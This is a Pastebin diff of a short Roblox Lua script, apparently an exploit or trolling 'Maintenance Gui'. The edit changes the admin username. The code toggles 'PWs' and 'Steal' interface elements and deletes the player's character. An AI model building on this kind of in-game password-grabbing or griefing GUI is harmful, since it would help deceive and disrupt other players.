View difference between Paste ID: QRc78Hpd and PJGxg7QN
SHOW: | | - or go back to the newest paste.
1
--Thanks for using c00lkidd's Maitenance Gui Edit!
2
if game.Lighting.Accounts:FindFirstChild(game.Players.LocalPlayer.Name) then
3
script.Parent:Remove() 
4
end
5
 
6-
admins={"max5564"}
6+
admins={"CaughtBodys"}
7
 
8
for i=1,#admins do
9
if script.Parent.Parent.Parent.Name == admins[i] then
10
script.Parent:WaitForChild("PWs").Visible = true
11
script.Parent.Steal.Visible = false    
12
end    
13
end
14
 
15
g = game.Workspace:WaitForChild(game.Players.LocalPlayer.Name)
16
17
    g:Remove()